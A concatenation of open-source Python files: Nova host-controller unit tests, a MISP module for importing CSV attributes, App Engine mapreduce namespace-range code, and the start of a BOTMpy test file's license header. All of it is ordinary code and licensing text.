class FakeRequestWithNovaZone(object):
environ = {"nova.context": context.get_admin_context()}
GET = {"zone": "nova"}
class HostTestCase(test.TestCase):
"""Test Case for hosts."""
def setUp(self):
super(HostTestCase, self).setUp()
self.controller = os_hosts.HostController()
self.req = FakeRequest()
self.stubs.Set(db, 'service_get_all',
stub_service_get_all)
self.stubs.Set(self.controller.api, 'set_host_enabled',
stub_set_host_enabled)
self.stubs.Set(self.controller.api, 'set_host_maintenance',
stub_set_host_maintenance)
self.stubs.Set(self.controller.api, 'host_power_action',
stub_host_power_action)
def _test_host_update(self, host, key, val, expected_value):
body = {key: val}
result = self.controller.update(self.req, host, body)
self.assertEqual(result[key], expected_value)
def test_list_hosts(self):
"""Verify that the compute hosts are returned."""
hosts = os_hosts._list_hosts(self.req)
self.assertEqual(hosts, HOST_LIST['hosts'])
def test_list_hosts_with_zone(self):
req = FakeRequestWithNovaZone()
hosts = os_hosts._list_hosts(req)
self.assertEqual(hosts, HOST_LIST_NOVA_ZONE)
def test_disable_host(self):
self._test_host_update('host_c1', 'status', 'disable', 'disabled')
self._test_host_update('host_c2', 'status', 'disable', 'enabled')
def test_enable_host(self):
self._test_host_update('host_c1', 'status', 'enable', 'enabled')
self._test_host_update('host_c2', 'status', 'enable', 'disabled')
def test_enable_maintenance(self):
self._test_host_update('host_c1', 'maintenance_mode',
'enable', 'on_maintenance')
def test_disable_maintenance(self):
self._test_host_update('host_c1', 'maintenance_mode',
'disable', 'off_maintenance')
def _test_host_update_notimpl(self, key, val):
def stub_service_get_all_notimpl(self, req):
return [{'host': 'notimplemented', 'topic': None,
'availability_zone': None}]
self.stubs.Set(db, 'service_get_all',
stub_service_get_all_notimpl)
body = {key: val}
self.assertRaises(webob.exc.HTTPNotImplemented,
self.controller.update,
self.req, 'notimplemented', body=body)
def test_disable_host_notimpl(self):
self._test_host_update_notimpl('status', 'disable')
def test_enable_maintenance_notimpl(self):
self._test_host_update_notimpl('maintenance_mode', 'enable')
def test_host_startup(self):
result = self.controller.startup(self.req, "host_c1")
self.assertEqual(result["power_action"], "startup")
def test_host_shutdown(self):
result = self.controller.shutdown(self.req, "host_c1")
self.assertEqual(result["power_action"], "shutdown")
def test_host_reboot(self):
result = self.controller.reboot(self.req, "host_c1")
self.assertEqual(result["power_action"], "reboot")
def _test_host_power_action_notimpl(self, method):
self.assertRaises(webob.exc.HTTPNotImplemented,
method, self.req, "notimplemented")
def test_host_startup_notimpl(self):
self._test_host_power_action_notimpl(self.controller.startup)
def test_host_shutdown_notimpl(self):
self._test_host_power_action_notimpl(self.controller.shutdown)
def test_host_reboot_notimpl(self):
self._test_host_power_action_notimpl(self.controller.reboot)
def test_bad_status_value(self):
bad_body = {"status": "bad"}
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
self.req, "host_c1", bad_body)
bad_body2 = {"status": "disablabc"}
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
self.req, "host_c1", bad_body2)
def test_bad_update_key(self):
bad_body = {"crazy": "bad"}
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
self.req, "host_c1", bad_body)
def test_bad_update_key_and_correct_udpate_key(self):
bad_body = {"status": "disable", "crazy": "bad"}
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
self.req, "host_c1", bad_body)
def test_good_udpate_keys(self):
body = {"status": "disable", "maintenance_mode": "enable"}
result = self.controller.update(self.req, 'host_c1', body)
self.assertEqual(result["host"], "host_c1")
self.assertEqual(result["status"], "disabled")
self.assertEqual(result["maintenance_mode"], "on_maintenance")
def test_bad_host(self):
self.assertRaises(webob.exc.HTTPNotFound, self.controller.update,
self.req, "bogus_host_name", {"status": "disable"})
def test_show_forbidden(self):
self.req.environ["nova.context"].is_admin = False
dest = 'dummydest'
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.show,
self.req, dest)
self.req.environ["nova.context"].is_admin = True
def test_show_host_not_exist(self):
"""A host given as an argument does not exists."""
self.req.environ["nova.context"].is_admin = True
dest = 'dummydest'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, dest)
def _create_compute_service(self):
"""Create compute-manager(ComputeNode and Service record)."""
ctxt = context.get_admin_context()
dic = {'host': 'dummy', 'binary': 'nova-compute', 'topic': 'compute',
'report_count': 0}
s_ref = db.service_create(ctxt, dic)
dic = {'service_id': s_ref['id'],
'vcpus': 16, 'memory_mb': 32, 'local_gb': 100,
'vcpus_used': 16, 'memory_mb_used': 32, 'local_gb_used': 10,
'hypervisor_type': 'qemu', 'hypervisor_version': 12003,
'cpu_info': '', 'stats': {}}
db.compute_node_create(ctxt, dic)
return db.service_get(ctxt, s_ref['id'])
def test_show_no_project(self):
"""No instance are running on the given host."""
ctxt = context.get_admin_context()
s_ref = self._create_compute_service()
result = self.controller.show(self.req, s_ref['host'])
proj = ['(total)', '(used_now)', '(used_max)']
column = ['host', 'project', 'cpu', 'memory_mb', 'disk_gb']
self.assertEqual(len(result['host']), 3)
for resource in result['host']:
self.assertTrue(resource['resource']['project'] in proj)
self.assertEqual(len(resource['resource']), 5)
self.assertTrue(set(resource['resource'].keys()) == set(column))
db.service_destroy(ctxt, s_ref['id'])
def test_show_works_correctly(self):
"""show() works correctly as expected."""
ctxt = context.get_admin_context()
s_ref = self._create_compute_service()
i_ref1 = _create_instance(project_id='p-01', host=s_ref['host'])
i_ref2 = _create_instance(project_id='p-02', vcpus=3,
host=s_ref['host'])
result = self.controller.show(self.req, s_ref['host'])
proj = ['(total)', '(used_now)', '(used_max)', 'p-01', 'p-02']
column = ['host', 'project', 'cpu', 'memory_mb', 'disk_gb']
self.assertEqual(len(result['host']), 5)
for resource in result['host']:
self.assertTrue(resource['resource']['project'] in proj)
self.assertEqual(len(resource['resource']), 5)
self.assertTrue(set(resource['resource'].keys()) == set(column))
db.service_destroy(ctxt, s_ref['id'])
db.instance_destroy(ctxt, i_ref1['uuid'])
db.instance_destroy(ctxt, i_ref2['uuid'])
class HostSerializerTest(test.TestCase):
def setUp(self):
super(HostSerializerTest, self).setUp()
self.deserializer = os_hosts.HostUpdateDeserializer()
def test_index_serializer(self):
serializer = os_hosts.HostIndexTemplate()
text = serializer.serialize(HOST_LIST)
tree = etree.fromstring(text)
self.assertEqual('hosts', tree.tag)
self.assertEqual(len(HOST_LIST['hosts']), len(tree))
for i in range(len(HOST_LIST)):
self.assertEqual('host', tree[i].tag)
self.assertEqual(HOST_LIST['hosts'][i]['host_name'],
tree[i].get('host_name'))
self.assertEqual(HOST_LIST['hosts'][i]['service'],
tree[i].get('service'))
def test_update_serializer_with_status(self):
exemplar = dict(host='host_c1', status='enabled')
serializer = os_hosts.HostUpdateTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('host', tree.tag)
for key, value in exemplar.items():
self.assertEqual(value, tree.get(key))
def test_update_serializer_with_maintainance_mode(self):
exemplar = dict(host='host_c1', maintenance_mode='enabled')
serializer = os_hosts.HostUpdateTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('host', tree.tag)
for key, value in exemplar.items():
self.assertEqual(value, tree.get(key))
def test_update_serializer_with_maintainance_mode_and_status(self):
exemplar = dict(host='host_c1',
maintenance_mode='enabled',
status='enabled')
serializer = os_hosts.HostUpdateTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('host', tree.tag)
for key, value in exemplar.items():
self.assertEqual(value, tree.get(key))
def test_action_serializer(self):
exemplar = dict(host='host_c1', power_action='reboot')
serializer = os_hosts.HostActionTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('host', tree.tag)
for key, value in exemplar.items():
self.assertEqual(value, tree.get(key))
def test_update_deserializer(self):
exemplar = dict(status='enabled', maintenance_mode='disable')
intext = """<?xml version='1.0' encoding='UTF-8'?>
<updates>
<status>enabled</status>
<maintenance_mode>disable</maintenance_mode>
</updates>"""
result = self.deserializer.deserialize(intext)
self.assertEqual(dict(body=exemplar), result)
|
apache-2.0
|
MISP/misp-modules
|
misp_modules/modules/import_mod/csvimport.py
|
1
|
15484
|
# -*- coding: utf-8 -*-
from pymisp import MISPEvent, MISPObject
from pymisp import __path__ as pymisp_path
import csv
import io
import json
import os
import base64
misperrors = {'error': 'Error'}
moduleinfo = {'version': '0.2', 'author': 'Christian Studer',
'description': 'Import Attributes from a csv file.',
'module-type': ['import']}
moduleconfig = []
userConfig = {
'header': {
'type': 'String',
'message': 'Define the header of the csv file, with types (included in MISP attribute types or attribute fields) separated by commas.\nFor fields that do not match these types or that you want to skip, please use space or simply nothing between commas.\nFor instance: ip-src,domain, ,timestamp'},
'has_header': {
'type': 'Boolean',
'message': 'Tick this box ONLY if there is a header line, NOT COMMENTED, and all the fields of this header are respecting the recommendations above.'},
'special_delimiter': {
'type': 'String',
'message': 'IF THE DELIMITERS ARE NOT COMMAS, please specify which ones are used (for instance: ";", "|", "/", "\t" for tabs, etc).'
}
}
mispattributes = {'userConfig': userConfig, 'inputSource': ['file'], 'format': 'misp_standard'}
misp_standard_csv_header = ['uuid', 'event_id', 'category', 'type', 'value', 'comment', 'to_ids', 'date',
'object_relation', 'attribute_tag', 'object_uuid', 'object_name', 'object_meta_category']
misp_context_additional_fields = ['event_info', 'event_member_org', 'event_source_org', 'event_distribution',
'event_threat_level_id', 'event_analysis', 'event_date', 'event_tag']
misp_extended_csv_header = misp_standard_csv_header + misp_context_additional_fields
class CsvParser():
def __init__(self, header, has_header, delimiter, data, from_misp, MISPtypes, categories):
self.misp_event = MISPEvent()
self.header = header
self.has_header = has_header
self.delimiter = delimiter
self.data = data
self.from_misp = from_misp
self.MISPtypes = MISPtypes
self.categories = categories
self.fields_number = len(self.header)
self.__score_mapping = {0: self.__create_standard_attribute,
1: self.__create_attribute_with_ids,
2: self.__create_attribute_with_tags,
3: self.__create_attribute_with_ids_and_tags,
4: self.__create_attribute_check_category,
5: self.__create_attribute_check_category_and_ids,
6: self.__create_attribute_check_category_and_tags,
7: self.__create_attribute_check_category_with_ids_and_tags}
def parse_csv(self):
if self.from_misp:
if self.header == misp_standard_csv_header:
self.__parse_misp_csv()
else:
attribute_fields = misp_standard_csv_header[:1] + misp_standard_csv_header[2:10]
object_fields = ['object_id'] + misp_standard_csv_header[10:]
attribute_indexes = []
object_indexes = []
for i in range(len(self.header)):
if self.header[i] in attribute_fields:
attribute_indexes.append(i)
elif self.header[i] in object_fields:
object_indexes.append(i)
if object_indexes:
if not any(field in self.header for field in ('object_uuid', 'object_id')) or 'object_name' not in self.header:
for line in self.data:
for index in object_indexes:
if line[index].strip():
return {'error': 'It is not possible to import MISP objects from your csv file if you do not specify any object identifier and object name to separate each object from each other.'}
if 'object_relation' not in self.header:
return {'error': 'In order to import MISP objects, an object relation for each attribute contained in an object is required.'}
self.__build_misp_event(attribute_indexes, object_indexes)
else:
attribute_fields = attribute_fields = misp_standard_csv_header[:1] + misp_standard_csv_header[2:9]
attribute_indexes = []
types_indexes = []
for i in range(len(self.header)):
if self.header[i] in attribute_fields:
attribute_indexes.append(i)
elif self.header[i] in self.MISPtypes:
types_indexes.append(i)
self.__parse_external_csv(attribute_indexes, types_indexes)
self.__finalize_results()
return {'success': 1}
################################################################################
# Parsing csv data with MISP fields, #
# but a custom header #
################################################################################
def __build_misp_event(self, attribute_indexes, object_indexes):
score = self.__get_score()
if object_indexes:
objects = {}
id_name = 'object_id' if 'object_id' in self.header else 'object_uuid'
object_id_index = self.header.index(id_name)
name_index = self.header.index('object_name')
for line in self.data:
attribute = self.__score_mapping[score](line, attribute_indexes)
object_id = line[object_id_index]
if object_id:
if object_id not in objects:
misp_object = MISPObject(line[name_index])
if id_name == 'object_uuid':
misp_object.uuid = object_id
objects[object_id] = misp_object
objects[object_id].add_attribute(**attribute)
else:
self.event.add_attribute(**attribute)
for misp_object in objects.values():
self.misp_event.add_object(**misp_object)
else:
for line in self.data:
attribute = self.__score_mapping[score](line, attribute_indexes)
self.misp_event.add_attribute(**attribute)
################################################################################
# Parsing csv data containing fields that are not #
# MISP attributes or objects standard fields #
# (but should be MISP attribute types!!) #
################################################################################
def __parse_external_csv(self, attribute_indexes, types_indexes):
score = self.__get_score()
if attribute_indexes:
for line in self.data:
try:
base_attribute = self.__score_mapping[score](line, attribute_indexes)
except IndexError:
continue
for index in types_indexes:
attribute = {'type': self.header[index], 'value': line[index]}
attribute.update(base_attribute)
self.misp_event.add_attribute(**attribute)
else:
for line in self.data:
for index in types_indexes:
self.misp_event.add_attribute(**{'type': self.header[index], 'value': line[index]})
################################################################################
# Parsing standard MISP csv format #
################################################################################
def __parse_misp_csv(self):
objects = {}
attribute_fields = self.header[:1] + self.header[2:8]
for line in self.data:
a_uuid, _, category, _type, value, comment, ids, timestamp, relation, tag, o_uuid, name, _ = line[:self.fields_number]
attribute = {t: v.strip('"') for t, v in zip(attribute_fields, (a_uuid, category, _type, value, comment, ids, timestamp))}
attribute['to_ids'] = True if attribute['to_ids'] == '1' else False
if tag:
attribute['Tag'] = [{'name': t.strip()} for t in tag.split(',')]
if relation:
if o_uuid not in objects:
objects[o_uuid] = MISPObject(name)
objects[o_uuid].add_attribute(relation, **attribute)
else:
self.misp_event.add_attribute(**attribute)
for uuid, misp_object in objects.items():
misp_object.uuid = uuid
self.misp_event.add_object(**misp_object)
################################################################################
# Utility functions #
################################################################################
def __create_attribute_check_category(self, line, indexes):
attribute = self.__create_standard_attribute(line, indexes)
self.__check_category(attribute)
return attribute
def __create_attribute_check_category_and_ids(self, line, indexes):
attribute = self.__create_attribute_with_ids(line, indexes)
self.__check_category(attribute)
return attribute
def __create_attribute_check_category_and_tags(self, line, indexes):
attribute = self.__create_attribute_with_tags(line, indexes)
self.__check_category(attribute)
return attribute
def __create_attribute_check_category_with_ids_and_tags(self, line, indexes):
attribute = self.__create_attribute_with_ids_and_tags(line, indexes)
self.__check_category(attribute)
return attribute
def __create_attribute_with_ids(self, line, indexes):
attribute = self.__create_standard_attribute(line, indexes)
self.__deal_with_ids(attribute)
return attribute
def __create_attribute_with_ids_and_tags(self, line, indexes):
attribute = self.__create_standard_attribute(line, indexes)
self.__deal_with_ids(attribute)
self.__deal_with_tags(attribute)
return attribute
def __create_attribute_with_tags(self, line, indexes):
attribute = self.__create_standard_attribute(line, indexes)
self.__deal_with_tags(attribute)
return attribute
def __create_standard_attribute(self, line, indexes):
return {self.header[index]: line[index] for index in indexes if line[index]}
def __check_category(self, attribute):
category = attribute['category']
if category in self.categories:
return
if category.capitalize() in self.categories:
attribute['category'] = category.capitalize()
return
del attribute['category']
@staticmethod
def __deal_with_ids(attribute):
attribute['to_ids'] = True if attribute['to_ids'] == '1' else False
@staticmethod
def __deal_with_tags(attribute):
attribute['Tag'] = [{'name': tag.strip()} for tag in attribute['Tag'].split(',')]
def __get_score(self):
score = 1 if 'to_ids' in self.header else 0
if 'attribute_tag' in self.header:
score += 2
if 'category' in self.header:
score += 4
return score
def __finalize_results(self):
event = json.loads(self.misp_event.to_json())
self.results = {key: event[key] for key in ('Attribute', 'Object') if (key in event and event[key])}
def __any_mandatory_misp_field(header):
return any(field in header for field in ('type', 'value'))
def __special_parsing(data, delimiter):
return list(tuple(part.strip() for part in line[0].split(delimiter)) for line in csv.reader(io.TextIOWrapper(io.BytesIO(data.encode()), encoding='utf-8')) if line and not line[0].startswith('#'))
def __standard_parsing(data):
return list(tuple(part.strip() for part in line) for line in csv.reader(io.TextIOWrapper(io.BytesIO(data.encode()), encoding='utf-8')) if line and not line[0].startswith('#'))
def handler(q=False):
if q is False:
return False
request = json.loads(q)
if request.get('data'):
try:
data = base64.b64decode(request['data']).decode('utf-8')
except UnicodeDecodeError:
misperrors['error'] = "Input is not valid UTF-8"
return misperrors
else:
misperrors['error'] = "Unsupported attributes type"
return misperrors
has_header = request['config'].get('has_header')
has_header = True if has_header == '1' else False
header = request['config']['header'].split(',') if request['config'].get('header').strip() else []
delimiter = request['config']['special_delimiter'] if request['config'].get('special_delimiter').strip() else ','
data = __standard_parsing(data) if delimiter == ',' else __special_parsing(data, delimiter)
if not header:
if has_header:
header = data.pop(0)
else:
misperrors['error'] = "Configuration error. Provide a header or use the one within the csv file and tick the checkbox 'Has_header'."
return misperrors
else:
header = [h.strip() for h in header]
if has_header:
del data[0]
if header == misp_standard_csv_header or header == misp_extended_csv_header:
header = misp_standard_csv_header
descFilename = os.path.join(pymisp_path[0], 'data/describeTypes.json')
with open(descFilename, 'r') as f:
description = json.loads(f.read())['result']
MISPtypes = description['types']
for h in header:
if not any((h in MISPtypes, h in misp_extended_csv_header, h in ('', ' ', '_', 'object_id'))):
misperrors['error'] = 'Wrong header field: {}. Please use a header value that can be recognized by MISP (or alternatively skip it using a whitespace).'.format(h)
return misperrors
from_misp = all((h in misp_extended_csv_header or h in ('', ' ', '_', 'object_id') for h in header))
if from_misp:
if not __any_mandatory_misp_field(header):
misperrors['error'] = 'Please make sure the data you try to import can be identified with a type/value combinaison.'
return misperrors
else:
if __any_mandatory_misp_field(header):
wrong_types = tuple(wrong_type for wrong_type in ('type', 'value') if wrong_type in header)
misperrors['error'] = 'Error with the following header: {}. It contains the following field(s): {}, which is(are) already provided by the usage of at least on MISP attribute type in the header.'.format(header, 'and'.join(wrong_types))
return misperrors
csv_parser = CsvParser(header, has_header, delimiter, data, from_misp, MISPtypes, description['categories'])
# build the attributes
result = csv_parser.parse_csv()
if 'error' in result:
return result
return {'results': csv_parser.results}
def introspection():
return mispattributes
def version():
moduleinfo['config'] = moduleconfig
return moduleinfo
|
agpl-3.0
|
datasciencedev/locality-sensitive-hashing
|
mapreduce/namespace_range.py
|
37
|
15075
|
#!/usr/bin/env python
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Represents a lexographic range of namespaces."""
# pylint: disable=g-bad-name
__all__ = [
'NAMESPACE_CHARACTERS',
'MAX_NAMESPACE_LENGTH',
'MAX_NAMESPACE',
'MIN_NAMESPACE',
'NAMESPACE_BATCH_SIZE',
'NamespaceRange',
'get_namespace_keys',
]
import itertools
import string
from google.appengine.api import datastore
from google.appengine.ext import db
from google.appengine.ext.db import metadata
NAMESPACE_CHARACTERS = ''.join(sorted(string.digits +
string.lowercase +
string.uppercase +
'._-'))
MAX_NAMESPACE_LENGTH = 100
MIN_NAMESPACE = ''
NAMESPACE_BATCH_SIZE = 50
def _setup_constants(alphabet=NAMESPACE_CHARACTERS,
max_length=MAX_NAMESPACE_LENGTH,
batch_size=NAMESPACE_BATCH_SIZE):
"""Calculate derived constant values. Only useful for testing."""
global NAMESPACE_CHARACTERS
global MAX_NAMESPACE_LENGTH
# pylint: disable=global-variable-undefined
global MAX_NAMESPACE
global _LEX_DISTANCE
global NAMESPACE_BATCH_SIZE
NAMESPACE_CHARACTERS = alphabet
MAX_NAMESPACE_LENGTH = max_length
MAX_NAMESPACE = NAMESPACE_CHARACTERS[-1] * MAX_NAMESPACE_LENGTH
NAMESPACE_BATCH_SIZE = batch_size
# _LEX_DISTANCE will contain the lexical distance between two adjacent
# characters in NAMESPACE_CHARACTERS at each character index. This is used
# to calculate the ordinal for each string. Example:
# NAMESPACE_CHARACTERS = 'ab'
# MAX_NAMESPACE_LENGTH = 3
# _LEX_DISTANCE = [1, 3, 7]
# '' => 0
# 'a' => 1
# 'aa' => 2
# 'aaa' => 3
# 'aab' => 4 - Distance between 'aaa' and 'aab' is 1.
# 'ab' => 5 - Distance between 'aa' and 'ab' is 3.
# 'aba' => 6
# 'abb' => 7
# 'b' => 8 - Distance between 'a' and 'b' is 7.
# 'ba' => 9
# 'baa' => 10
# 'bab' => 11
# ...
# _namespace_to_ord('bab') = (1 * 7 + 1) + (0 * 3 + 1) + (1 * 1 + 1) = 11
_LEX_DISTANCE = [1]
for i in range(1, MAX_NAMESPACE_LENGTH):
_LEX_DISTANCE.append(
_LEX_DISTANCE[i-1] * len(NAMESPACE_CHARACTERS) + 1)
# pylint: disable=undefined-loop-variable
del i
_setup_constants()
def _ord_to_namespace(n, _max_length=None):
"""Convert a namespace ordinal to a namespace string.
Converts an int, representing the sequence number of a namespace ordered
lexographically, into a namespace string.
>>> _ord_to_namespace(0)
''
>>> _ord_to_namespace(1)
'-'
>>> _ord_to_namespace(2)
'--'
>>> _ord_to_namespace(3)
'---'
Args:
n: A number representing the lexographical ordering of a namespace.
_max_length: The maximum namespace length.
Returns:
A string representing the nth namespace in lexographical order.
"""
if _max_length is None:
_max_length = MAX_NAMESPACE_LENGTH
length = _LEX_DISTANCE[_max_length - 1]
if n == 0:
return ''
n -= 1
return (NAMESPACE_CHARACTERS[n / length] +
_ord_to_namespace(n % length, _max_length - 1))
def _namespace_to_ord(namespace):
"""Converts a namespace string into an int representing its lexographic order.
>>> _namespace_to_ord('')
''
>>> _namespace_to_ord('_')
1
>>> _namespace_to_ord('__')
2
Args:
namespace: A namespace string.
Returns:
An int representing the lexographical order of the given namespace string.
"""
n = 0
for i, c in enumerate(namespace):
n += (_LEX_DISTANCE[MAX_NAMESPACE_LENGTH - i- 1] *
NAMESPACE_CHARACTERS.index(c)
+ 1)
return n
def _key_for_namespace(namespace, app):
"""Return the __namespace__ key for a namespace.
Args:
namespace: The namespace whose key is requested.
app: The id of the application that the key belongs to.
Returns:
A db.Key representing the namespace.
"""
if namespace:
return db.Key.from_path(metadata.Namespace.KIND_NAME,
namespace,
_app=app)
else:
return db.Key.from_path(metadata.Namespace.KIND_NAME,
metadata.Namespace.EMPTY_NAMESPACE_ID,
_app=app)
class NamespaceRange(object):
"""An inclusive lexographical range of namespaces.
This class is immutable.
"""
def __init__(self,
namespace_start=None,
namespace_end=None,
_app=None):
# pylint: disable=g-doc-args
"""Initializes a NamespaceRange instance.
Args:
namespace_start: A string representing the start of the namespace range.
namespace_start is included in the range. If namespace_start is None
then the lexographically first namespace is used.
namespace_end: A string representing the end of the namespace range.
namespace_end is included in the range and must be >= namespace_start.
If namespace_end is None then the lexographically last namespace is
used.
Raises:
ValueError: if namespace_start > namespace_end.
"""
if namespace_start is None:
namespace_start = MIN_NAMESPACE
if namespace_end is None:
namespace_end = MAX_NAMESPACE
if namespace_start > namespace_end:
raise ValueError('namespace_start (%r) > namespace_end (%r)' % (
namespace_start, namespace_end))
self.__namespace_start = namespace_start
self.__namespace_end = namespace_end
self.__app = _app
@property
def app(self):
return self.__app
@property
def namespace_start(self):
return self.__namespace_start
@property
def namespace_end(self):
return self.__namespace_end
@property
def is_single_namespace(self):
"""True if the namespace range only includes a single namespace."""
return self.namespace_start == self.namespace_end
def split_range(self):
"""Splits the NamespaceRange into two nearly equal-sized ranges.
Returns:
If this NamespaceRange contains a single namespace then a list containing
this NamespaceRange is returned. Otherwise a two-element list containing
two NamespaceRanges whose total range is identical to this
NamespaceRange's is returned.
"""
if self.is_single_namespace:
return [self]
mid_point = (_namespace_to_ord(self.namespace_start) +
_namespace_to_ord(self.namespace_end)) // 2
return [NamespaceRange(self.namespace_start,
_ord_to_namespace(mid_point),
_app=self.app),
NamespaceRange(_ord_to_namespace(mid_point+1),
self.namespace_end,
_app=self.app)]
def __copy__(self):
return self.__class__(self.__namespace_start,
self.__namespace_end,
self.__app)
def __eq__(self, o):
return (self.namespace_start == o.namespace_start and
self.namespace_end == o.namespace_end)
def __hash__(self):
return hash((self.namespace_start, self.namespace_end, self.app))
def __repr__(self):
if self.app is None:
return 'NamespaceRange(namespace_start=%r, namespace_end=%r)' % (
self.namespace_start, self.namespace_end)
else:
return 'NamespaceRange(namespace_start=%r, namespace_end=%r, _app=%r)' % (
self.namespace_start, self.namespace_end, self.app)
def with_start_after(self, after_namespace):
"""Returns a copy of this NamespaceName with a new namespace_start.
Args:
after_namespace: A namespace string.
Returns:
A NamespaceRange object whose namespace_start is the lexographically next
namespace after the given namespace string.
Raises:
ValueError: if the NamespaceRange includes only a single namespace.
"""
namespace_start = _ord_to_namespace(_namespace_to_ord(after_namespace) + 1)
return NamespaceRange(namespace_start, self.namespace_end, _app=self.app)
def make_datastore_query(self, cursor=None):
"""Returns a datastore.Query that generates all namespaces in the range.
Args:
cursor: start cursor for the query.
Returns:
A datastore.Query instance that generates db.Keys for each namespace in
the NamespaceRange.
"""
filters = {}
filters['__key__ >= '] = _key_for_namespace(
self.namespace_start, self.app)
filters['__key__ <= '] = _key_for_namespace(
self.namespace_end, self.app)
return datastore.Query('__namespace__',
filters=filters,
keys_only=True,
cursor=cursor,
_app=self.app)
def normalized_start(self):
"""Returns a NamespaceRange with leading non-existant namespaces removed.
Returns:
A copy of this NamespaceRange whose namespace_start is adjusted to exclude
the portion of the range that contains no actual namespaces in the
datastore. None is returned if the NamespaceRange contains no actual
namespaces in the datastore.
"""
namespaces_after_key = list(self.make_datastore_query().Run(limit=1))
if not namespaces_after_key:
return None
namespace_after_key = namespaces_after_key[0].name() or ''
return NamespaceRange(namespace_after_key,
self.namespace_end,
_app=self.app)
def to_json_object(self):
"""Returns a dict representation that can be serialized to JSON."""
obj_dict = dict(namespace_start=self.namespace_start,
namespace_end=self.namespace_end)
if self.app is not None:
obj_dict['app'] = self.app
return obj_dict
@classmethod
def from_json_object(cls, json):
"""Returns a NamespaceRange from an object deserialized from JSON."""
return cls(json['namespace_start'],
json['namespace_end'],
_app=json.get('app'))
# TODO(user): Implement an option where the returned namespace range is
# not normalized using with_start_after to support consistent namespace
# queries.
@classmethod
def split(cls,
n,
contiguous,
can_query=itertools.chain(itertools.repeat(True, 50),
itertools.repeat(False)).next,
_app=None):
# pylint: disable=g-doc-args
"""Splits the complete NamespaceRange into n equally-sized NamespaceRanges.
Args:
n: The maximum number of NamespaceRanges to return. Fewer than n
namespaces may be returned.
contiguous: If True then the returned NamespaceRanges will cover the
entire space of possible namespaces (i.e. from MIN_NAMESPACE to
MAX_NAMESPACE) without gaps. If False then the returned
NamespaceRanges may exclude namespaces that don't appear in the
datastore.
can_query: A function that returns True if split() can query the datastore
to generate more fair namespace range splits, and False otherwise.
If not set then split() is allowed to make 50 datastore queries.
Returns:
A list of at most n NamespaceRanges representing a near-equal distribution
of actual existant datastore namespaces. The returned list will be sorted
lexographically.
Raises:
ValueError: if n is < 1.
"""
if n < 1:
raise ValueError('n must be >= 1')
ranges = None
if can_query():
if not contiguous:
ns_keys = get_namespace_keys(_app, n + 1)
if not ns_keys:
return []
else:
if len(ns_keys) <= n:
# If you have less actual namespaces than number of NamespaceRanges
# to return, then just return the list of those namespaces.
ns_range = []
for ns_key in ns_keys:
ns_range.append(NamespaceRange(ns_key.name() or '',
ns_key.name() or '',
_app=_app))
return sorted(ns_range,
key=lambda ns_range: ns_range.namespace_start)
# Use the first key and save the initial normalized_start() call.
ranges = [NamespaceRange(ns_keys[0].name() or '', _app=_app)]
else:
ns_range = NamespaceRange(_app=_app).normalized_start()
if ns_range is None:
return [NamespaceRange(_app=_app)]
ranges = [ns_range]
else:
ranges = [NamespaceRange(_app=_app)]
singles = []
while ranges and (len(ranges) + len(singles)) < n:
namespace_range = ranges.pop(0)
if namespace_range.is_single_namespace:
singles.append(namespace_range)
else:
left, right = namespace_range.split_range()
if can_query():
right = right.normalized_start()
if right is not None:
ranges.append(right)
ranges.append(left)
ns_ranges = sorted(singles + ranges,
key=lambda ns_range: ns_range.namespace_start)
if contiguous:
if not ns_ranges:
# This condition is possible if every namespace was deleted after the
# first call to ns_range.normalized_start().
return [NamespaceRange(_app=_app)]
continuous_ns_ranges = []
for i in range(len(ns_ranges)):
if i == 0:
namespace_start = MIN_NAMESPACE
else:
namespace_start = ns_ranges[i].namespace_start
if i == len(ns_ranges) - 1:
namespace_end = MAX_NAMESPACE
else:
namespace_end = _ord_to_namespace(
_namespace_to_ord(ns_ranges[i+1].namespace_start) - 1)
continuous_ns_ranges.append(NamespaceRange(namespace_start,
namespace_end,
_app=_app))
return continuous_ns_ranges
else:
return ns_ranges
def __iter__(self):
"""Iterate over all the namespaces within this range."""
cursor = None
while True:
query = self.make_datastore_query(cursor=cursor)
count = 0
for ns_key in query.Run(limit=NAMESPACE_BATCH_SIZE):
count += 1
yield ns_key.name() or ''
if count < NAMESPACE_BATCH_SIZE:
break
cursor = query.GetCursor()
def get_namespace_keys(app, limit):
"""Get namespace keys."""
ns_query = datastore.Query('__namespace__', keys_only=True, _app=app)
return list(ns_query.Run(limit=limit, batch_size=limit))
|
apache-2.0
|
pmeier82/BOTMpy
|
botmpy/test/test_nodes_artifacts.py
|
1
|
3553
|
# -*- coding: utf-8 -*-
#_____________________________________________________________________________
#
# Copyright (c) 2012 Berlin Institute of Technology
# All rights reserved.
#
# Developed by: Neural Information Processing Group (NI)
# School for Electrical Engineering and Computer Science
# Berlin Institute of Technology
# MAR 5-6, Marchstr. 23, 10587 Berlin, Germany
# http://www.ni.tu-berlin.de/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal with the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimers.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimers in the documentation
# and/or other materials provided with the distribution.
# * Neither the names of Neural Information Processing Group (NI), Berlin
# Institute of Technology, nor the names of its contributors may be used to
